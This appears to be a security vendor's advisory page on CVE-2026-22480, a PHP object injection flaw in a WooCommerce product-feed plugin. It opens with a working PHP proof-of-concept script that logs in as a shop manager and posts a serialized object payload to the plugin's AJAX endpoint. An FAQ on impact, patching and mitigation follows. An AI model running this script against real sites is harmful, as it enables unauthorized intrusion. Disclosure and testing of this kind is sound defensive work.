// CVE-2026-22480 - WebToffee WooCommerce Product Feeds – Google Shopping, Pinterest, TikTok Ads, & More <= 2.3.3 - Authenticated (Shop manager+) PHP Object Injection

<?php
/**
 * Proof of Concept for CVE-2026-22480
 * Requires: Shop manager or higher WordPress credentials
 * Target: WordPress site with vulnerable WebToffee Product Feeds plugin (<=2.3.3)
 *
 * This script demonstrates the PHP object injection vulnerability by sending
 * a serialized payload to the vulnerable AJAX endpoint.
 *
 * WARNING: This is for authorized security testing only.
 */

$target_url = 'https://example.com/wp-admin/admin-ajax.php';
$username = 'shop_manager_user';
$password = 'shop_manager_pass';

// Create a malicious serialized object payload
// This is a demonstration payload - actual exploitation requires a POP chain
$malicious_object = 'O:8:"stdClass":1:{s:4:"test";s:9:"injected!";}';

// WordPress AJAX action for the vulnerable plugin
$ajax_action = 'wt_product_feed_export_ajax';

// Initialize cURL session
$ch = curl_init();

// First, authenticate to get WordPress cookies
$login_url = str_replace('/admin-ajax.php', '/wp-login.php', $target_url);

$login_fields = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url,
    'testcookie' => '1'
];

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_fields));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

$response = curl_exec($ch);

// Check if authentication was successful
if (strpos($response, 'dashboard') === false && strpos($response, 'admin') === false) {
    die("Authentication failed. Check credentials.");
}

// Now send the exploit payload to the vulnerable AJAX endpoint
$exploit_fields = [
    'action' => $ajax_action,
    'form_data' => $malicious_object,
    'security' => 'dummy_nonce', // Nonce may be required but could be bypassed
    'step' => 'export',
    'offset' => '0'
];

curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_fields));
curl_setopt($ch, CURLOPT_REFERER, str_replace('/admin-ajax.php', '/wp-admin/', $target_url));

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

curl_close($ch);

// Analyze response
if ($http_code == 200) {
    echo "Exploit attempt completed. HTTP 200 response received.n";
    echo "Response length: " . strlen($response) . " bytesn";
    
    // Check for signs of successful injection
    if (strpos($response, 'injected!') !== false) {
        echo "SUCCESS: Payload appears to have been executed.n";
    } else if (strpos($response, 'serialize') !== false || strpos($response, 'unserialize') !== false) {
        echo "Possible error in deserialization detected.n";
    }
} else {
    echo "Request failed with HTTP code: $http_coden";
}

// Clean up
if (file_exists('cookies.txt')) {
    unlink('cookies.txt');
}

?>

Frequently Asked Questions

What is CVE-2026-22480?
Understanding the vulnerability
CVE-2026-22480 is a PHP Object Injection vulnerability in the WebToffee WooCommerce Product Feeds plugin for WordPress, affecting versions up to 2.3.3. It allows authenticated users with shop manager-level access to inject arbitrary PHP objects through unsafe deserialization of user input.
How does the vulnerability work?
Mechanics of exploitation
The vulnerability arises from the deserialization of untrusted input from the ‘form_data’ parameter in AJAX requests. Attackers can send crafted requests that include serialized objects, potentially leading to code execution if a suitable gadget chain exists in the environment.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the WebToffee WooCommerce Product Feeds plugin version 2.3.3 or earlier is at risk. Specifically, authenticated users with shop manager or higher privileges can exploit this vulnerability.
How can I check if my site is vulnerable?
Verification steps
To determine if your site is vulnerable, check the version of the WebToffee Product Feeds plugin installed. If it is version 2.3.3 or earlier, your site is susceptible to CVE-2026-22480.
How can I fix this vulnerability?
Mitigation steps
The vulnerability is patched in version 2.3.4 of the WebToffee Product Feeds plugin. Update your plugin to the latest version to mitigate this issue and ensure that unsafe deserialization is no longer possible.
What does the CVSS score of 6.6 indicate?
Understanding risk levels
A CVSS score of 6.6 is classified as medium severity. This indicates that while the vulnerability requires authenticated access to exploit, it poses a significant risk if combined with other vulnerabilities that allow for a successful attack.
What is a PHP Object Injection?
Defining the concept
PHP Object Injection occurs when an application deserializes untrusted data, allowing an attacker to manipulate the application’s object state. This can lead to various attacks, including arbitrary file deletion or remote code execution, depending on the application’s context.
What is a proof of concept for this vulnerability?
Demonstrating the issue
A proof of concept (PoC) demonstrates how an attacker can exploit CVE-2026-22480 by sending a crafted AJAX request with a malicious serialized object payload. This PoC illustrates the vulnerability’s potential impact in a controlled environment.
What precautions should I take after patching?
Post-mitigation best practices
After updating the plugin, review user access levels and ensure that only necessary users have shop manager privileges. Regularly audit your WordPress plugins and themes for vulnerabilities and apply security best practices.
Are there any known exploits for this vulnerability?
Current threat landscape
As of now, there are no publicly known exploits specifically targeting CVE-2026-22480. However, the potential for exploitation exists if an attacker identifies a suitable gadget chain in the environment.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the WebToffee Product Feeds plugin until a patch can be applied. Additionally, restrict access to the WordPress admin area to trusted users only.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations